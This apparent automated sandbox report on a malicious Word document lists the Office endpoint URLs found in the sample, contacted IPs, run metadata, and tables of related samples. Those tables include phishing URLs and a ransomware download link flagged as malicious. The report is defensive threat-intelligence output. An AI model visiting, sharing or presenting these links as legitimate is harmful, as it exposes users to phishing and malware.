                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                          high
                                          https://cr.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                            high
                                            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://portal.office.com/account/?ref=ClientMeControlCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                              high
                                              https://graph.ppe.windows.netCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptioneventsCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.netCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                    high
                                                    https://my.microsoftpersonalcontent.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://store.office.cn/addinstemplateCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://api.aadrm.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                        high
                                                        https://messaging.engagement.office.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                            high
                                                            https://dev0-api.acompli.net/autodetectCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.msCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.diagnosticssdf.office.com/v2/feedbackCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                              high
                                                              https://api.powerbi.com/v1.0/myorg/groupsCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                high
                                                                https://web.microsoftstream.com/video/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                  high
                                                                  https://api.addins.store.officeppe.com/addinstemplateCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://graph.windows.netCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                    high
                                                                    https://dataservice.o365filtering.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://officesetup.getmicrosoftkey.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://analysis.windows.net/powerbi/apiCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                      high
                                                                      https://prod-global-autodetect.acompli.net/autodetectCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                        high
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                          high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                            high
                                                                            https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                              high
                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                high
                                                                                https://ncus.contentsync.CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                  high
                                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                    high
                                                                                    http://weather.service.msn.com/data.aspxCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                      high
                                                                                      https://apis.live.net/v5.0/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                        high
                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                          high
                                                                                          https://messaging.lifecycle.office.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                            high
                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                              high
                                                                                              https://management.azure.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                  high
                                                                                                  https://wus2.contentsync.CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://incidents.diagnostics.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                    high
                                                                                                    https://clients.config.office.net/user/v1.0/iosCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                      high
                                                                                                      https://insertmedia.bing.office.net/odc/insertmediaCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                        high
                                                                                                        https://o365auditrealtimeingestion.manage.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                            high
                                                                                                            https://api.office.netCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                              high
                                                                                                              https://incidents.diagnosticssdf.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policiesCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                  high
                                                                                                                  https://entitlement.diagnostics.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                    high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                      high
                                                                                                                      https://substrate.office.com/search/api/v2/initCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                          high
                                                                                                                          https://storage.live.com/clientlogs/uploadlocationCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office365.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                              high
                                                                                                                              https://webshell.suite.office.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistoryCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://management.azure.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.lifecycle.office.com/getcustommessage16CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://clients.config.office.net/c2r/v1.0/InteractiveInstallationCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://graph.windows.net/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://api.powerbi.com/beta/myorg/importsCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://devnull.onenote.comCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://messaging.action.office.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://ncus.pagecontentsync.CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonCE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://messaging.office.com/CE458921-C0C4-4579-9BB4-3A4F11873036.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        185.199.109.133
                                                                                                                                                        unknownNetherlands
                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                        185.199.108.133
                                                                                                                                                        raw.githubusercontent.comNetherlands
                                                                                                                                                        54113FASTLYUStrue
                                                                                                                                                        Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                        Analysis ID:686004
                                                                                                                                                        Start date and time:2022-08-18 03:56:06 +02:00
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 5m 31s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Sample file name:dl18aYTBo5.docx
                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                        Run name:Potential for more IOCs and behavior
                                                                                                                                                        Number of analysed new started processes analysed:19
                                                                                                                                                        Number of new started drivers analysed:1
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal96.expl.evad.winDOCX@3/15@2/2
                                                                                                                                                        EGA Information:Failed
                                                                                                                                                        HDC Information:Failed
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Found application associated with file extension: .docx
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                        • Scroll down
                                                                                                                                                        • Close Viewer
                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.76.141, 52.109.12.24, 52.109.88.40, 52.109.88.39
                                                                                                                                                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                        No simulations
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        185.199.109.133iAXreikIsA.exeGet hashmaliciousBrowse
                                                                                                                                                          https://github.com/DaxStudio/DaxStudio/releases/download/v2.17.3/DaxStudio_2_17_3_setup.exeGet hashmaliciousBrowse
                                                                                                                                                            https://github.com/ytisf/theZoo/raw/master/malware/Binaries/Trojan.Ransom.Petya/Trojan.Ransom.Petya.zipGet hashmaliciousBrowse
                                                                                                                                                              RbMOGd6U5O.exeGet hashmaliciousBrowse
                                                                                                                                                                XMZU3.exeGet hashmaliciousBrowse
                                                                                                                                                                  lZJvRJVfBN.exeGet hashmaliciousBrowse
                                                                                                                                                                    oF4oZlsv0P.exeGet hashmaliciousBrowse
                                                                                                                                                                      vLjp6CaTBo.exeGet hashmaliciousBrowse
                                                                                                                                                                        https://ganeshsingh.net/b/v/pahr.johansson@axactor.seGet hashmaliciousBrowse
                                                                                                                                                                          finalpoc.docGet hashmaliciousBrowse
                                                                                                                                                                            https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/Get hashmaliciousBrowse
                                                                                                                                                                              I5cqn1hyQj.exeGet hashmaliciousBrowse
                                                                                                                                                                                psk.apkGet hashmaliciousBrowse
                                                                                                                                                                                  YPDtDZozE3.exeGet hashmaliciousBrowse
                                                                                                                                                                                    Invoice_VC85262241.xllGet hashmaliciousBrowse
                                                                                                                                                                                      funds_transfer2414.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        funds_transfer2497.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          zskaJp3ICG.exeGet hashmaliciousBrowse
                                                                                                                                                                                            LT8H3IGH0z.exeGet hashmaliciousBrowse
                                                                                                                                                                                              OBohkBDX8b.exeGet hashmaliciousBrowse
                                                                                                                                                                                                185.199.108.133dl18aYTBo5.docxGet hashmaliciousBrowse
                                                                                                                                                                                                  Fafp1MozEr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    QnD9G3EDPF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      2aa6hVVLY8.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        kKdZBhK40w.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          https://home-7f8cd-docs-dj86s-work-dtb03j.teleporthq.app/Get hashmaliciousBrowse
                                                                                                                                                                                                            c39-EmprisaMaldoc.rtfGet hashmaliciousBrowse
                                                                                                                                                                                                              j4SGb5BB2X.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                https://raw.githubusercontent.com/BodgKnK/knkbest/main/KNKCHEATS%20CLIENT%20(NO%20UPDATER%20-%20CHECKER)%20Update%2016-6-2022.rarGet hashmaliciousBrowse
                                                                                                                                                                                                                  Jylly Premium.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                    https://github.com/MindShow/USBDisplay/raw/main/WinDows/MSDisplay_Windows_V2.0.1.7.3.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      HMHxuNQqAg.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                        f8fRVHCGi4.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                          djk33wYmxX.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            eRjPMfhswq.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              vfk5zQPDm6.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                lZJvRJVfBN.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                  J92WUldVoP.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                    KYYE76X2Wl.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                      E20920A7259CABE4F4BBEF5BF983181AD47FB8C075D7F.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                        raw.githubusercontent.comFafp1MozEr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        QnD9G3EDPF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        J1j2AmKkNE.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.110.133
                                                                                                                                                                                                                                        zSBWjvoh2U.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.110.133
                                                                                                                                                                                                                                        2aa6hVVLY8.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        cTl94OLYPR.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.110.133
                                                                                                                                                                                                                                        u3KFNxHC8s.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        iAXreikIsA.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        kKdZBhK40w.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        F1E1B516A83F303659E53D513C9C3DA9DFD466F40B96F.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        y5rfpWxfPd.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        mizkB8caOL.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        injector.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.111.133
                                                                                                                                                                                                                                        Rwwsr82vkS.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        c39-EmprisaMaldoc.rtfGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        j4SGb5BB2X.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        sJq1pykxns.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        https://github.com/ytisf/theZoo/raw/master/malware/Binaries/Trojan.Ransom.Petya/Trojan.Ransom.Petya.zipGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        57lsAxwpQZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                        FASTLYUSdl18aYTBo5.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        http://propertyconceptscommercial.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.91
                                                                                                                                                                                                                                        http://propertyconceptscommercial.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.91
                                                                                                                                                                                                                                        https://uspps.delivery/PackageGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 199.232.136.157
                                                                                                                                                                                                                                        Fafp1MozEr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        QnD9G3EDPF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        J1j2AmKkNE.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.110.133
                                                                                                                                                                                                                                        zSBWjvoh2U.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.110.133
                                                                                                                                                                                                                                        2aa6hVVLY8.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        cTl94OLYPR.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.110.133
                                                                                                                                                                                                                                        IMG#U007e12345678-0987654334-09876545FIL.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 199.232.192.209
                                                                                                                                                                                                                                        https://share.hsforms.com/105QeafykTs6LgkJcpW00mQdejzhGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.65.26
                                                                                                                                                                                                                                        https://habach-youssef1.systeme.io/apozke/contactGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.26
                                                                                                                                                                                                                                        https://blog.transformarecife.com.br/https/bpi.com.ph/onlinebanking/px1ugqJFYX9VRQcDykZ4wS7f6iWmNB28KbdUensa0TA3EHzMGLjtCOhPoIvr5l/index.php?auth=px1ugqJFYX9VRQcDykZ4wS7f6iWmNB28KbdUensa0TA3EHzMGLjtCOhPoIvr5lGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.64.114
                                                                                                                                                                                                                                        https://michelz.clickfunnels.com/webinar-registrationhc87zwq8Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                                                        iAXreikIsA.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        Cap Rate Realty LLC.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 199.232.192.209
                                                                                                                                                                                                                                        PAYMENT COPY PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.159
                                                                                                                                                                                                                                        https://encrypted-invoice-ref0091.myportfolio.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                                                        https://gfdbfshnfndbfzgbzxcbzcbxbzcbzb.myportfolio.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.0.119
                                                                                                                                                                                                                                        FASTLYUSdl18aYTBo5.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        http://propertyconceptscommercial.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.91
                                                                                                                                                                                                                                        http://propertyconceptscommercial.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.91
                                                                                                                                                                                                                                        https://uspps.delivery/PackageGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 199.232.136.157
                                                                                                                                                                                                                                        Fafp1MozEr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        QnD9G3EDPF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        J1j2AmKkNE.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.110.133
                                                                                                                                                                                                                                        zSBWjvoh2U.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.110.133
                                                                                                                                                                                                                                        2aa6hVVLY8.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        cTl94OLYPR.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.110.133
                                                                                                                                                                                                                                        IMG#U007e12345678-0987654334-09876545FIL.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 199.232.192.209
                                                                                                                                                                                                                                        https://share.hsforms.com/105QeafykTs6LgkJcpW00mQdejzhGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.65.26
                                                                                                                                                                                                                                        https://habach-youssef1.systeme.io/apozke/contactGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.26
                                                                                                                                                                                                                                        https://blog.transformarecife.com.br/https/bpi.com.ph/onlinebanking/px1ugqJFYX9VRQcDykZ4wS7f6iWmNB28KbdUensa0TA3EHzMGLjtCOhPoIvr5l/index.php?auth=px1ugqJFYX9VRQcDykZ4wS7f6iWmNB28KbdUensa0TA3EHzMGLjtCOhPoIvr5lGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.64.114
                                                                                                                                                                                                                                        https://michelz.clickfunnels.com/webinar-registrationhc87zwq8Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                                                        iAXreikIsA.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        Cap Rate Realty LLC.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 199.232.192.209
                                                                                                                                                                                                                                        PAYMENT COPY PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.159
                                                                                                                                                                                                                                        https://encrypted-invoice-ref0091.myportfolio.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                                                        https://gfdbfshnfndbfzgbzxcbzcbxbzcbzb.myportfolio.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.0.119
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                        ce5f3254611a8c095a3d821d44539877wWLwoD14Xo.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        ZZkLH4O0Y3.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        icRTA4gcSe.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        dfqqRjnCV5.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        uaMVRwwuyZ.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        NeF7svYyqN.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        yYtTDWoZWx.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        6bdklAYa6u.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        o3MCBdIl7r.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        a2Mx3iJgEo.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        aeXxqezX4E.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        WUumgFooNU.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        SecuriteInfo.com.W32.SmokeLoader.C.genEldorado.4925.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        XBtHx41Ruc.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        d67taAtF6k.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        Fafp1MozEr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        QnD9G3EDPF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
